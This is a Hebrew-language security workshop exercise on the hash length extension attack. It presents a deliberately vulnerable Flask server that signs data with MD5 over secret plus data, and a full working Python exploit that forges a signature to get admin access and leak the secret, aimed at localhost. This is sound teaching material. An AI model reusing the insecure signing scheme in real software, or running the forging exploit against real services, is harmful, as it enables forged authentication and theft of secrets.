סדנת אבטחת מידע - Hash Length Extension Attack

קוד השרת שנרצה לפרוץ:

import hashlib
import secrets
from flask import Flask, request, jsonify
import urllib.parse

app = Flask(__name__)

SECRET = secrets.token_hex(4).encode('latin-1')

@app.route("/")
def hello():
  parts = request.query_string.split(b'&')
  for p in parts:
    name, val = p.split(b'=')
    if name == b'data':
      data = urllib.parse.unquote_to_bytes(val)
    elif name == b'sig':
      sig = val

  expected_sig = hashlib.md5(SECRET + data).hexdigest().encode('latin-1') 
  if expected_sig == sig:
    p = {w.split(b'=')[0]: w.split(b'=')[1] for w in data.split(b'&')}
    if int(p[b'uid']) == 1:
      return "Welcome Master. The secret key is: {}\n".format(SECRET)
    else:
      return "Welcome User\n"
  
  print('expected sig = {}'.format(expected_sig))
  print('got sig = {}'.format(sig))
  print('got data = {}'.format(data))

  return "INTRUDER ALERT\n"

@app.route("/tip")
def tip():
  data = b'uid=0'
  return jsonify({
    'data': data,
    'sig': hashlib.md5(SECRET + data).hexdigest(),
    })


if __name__ == '__main__':
  app.run()

כדי להריץ יש לשמור את הקוד לקובץ בשם server.py, להתקין flask באמצעות:

pip install flask

ואז להריץ משורת הפקודה:

python server.py

המשימה שלכם: לגלות מהו המפתח הסודי של השרת.

ניתן ורצוי להיעזר במאמר כאן:
https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks

שתי תמונות שונות עם אותו ערך MD5

brownwhite

תוכנית פייתון שמשתמשת ב Hash Length Extension כדי לפרוץ לשרת:

from __future__ import print_function
import sys
from socket import htonl
from pymd5 import md5
import requests
import textwrap
import struct
import urllib

BASE = 'http://localhost:5000'
SECRET_LENGTH = 8
fake_data = '&uid=1'

r = requests.get(BASE + '/tip')
r.raise_for_status()
existing_hash = r.json()[u'sig'].encode('utf-8')
data = r.json()[u'data'].encode('utf-8')
a, b, c, d = [int(x, 16) for x in textwrap.wrap(existing_hash, 8)]

h = md5("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")
h.state = [
  htonl(a),
  htonl(b),
  htonl(c),
  htonl(d),
  ]

h.update(fake_data)
fake_sig = ''.join(['{:02x}'.format(x) for x in struct.unpack('16B', h.digest())])
print('sig: {}'.format(fake_sig))

filler = 56 - SECRET_LENGTH - len(data)
msg_len = 8 * (56 - filler)
msg = data + "\x80" + ("\x00" * (filler - 1)) + struct.pack("q", msg_len) + fake_data

post_data = {
    'data': msg,
    'sig': fake_sig,
    }
r = requests.get(BASE + '/?data={}&sig={}'.format(urllib.quote(msg), fake_sig))
r.raise_for_status()
print(r.text)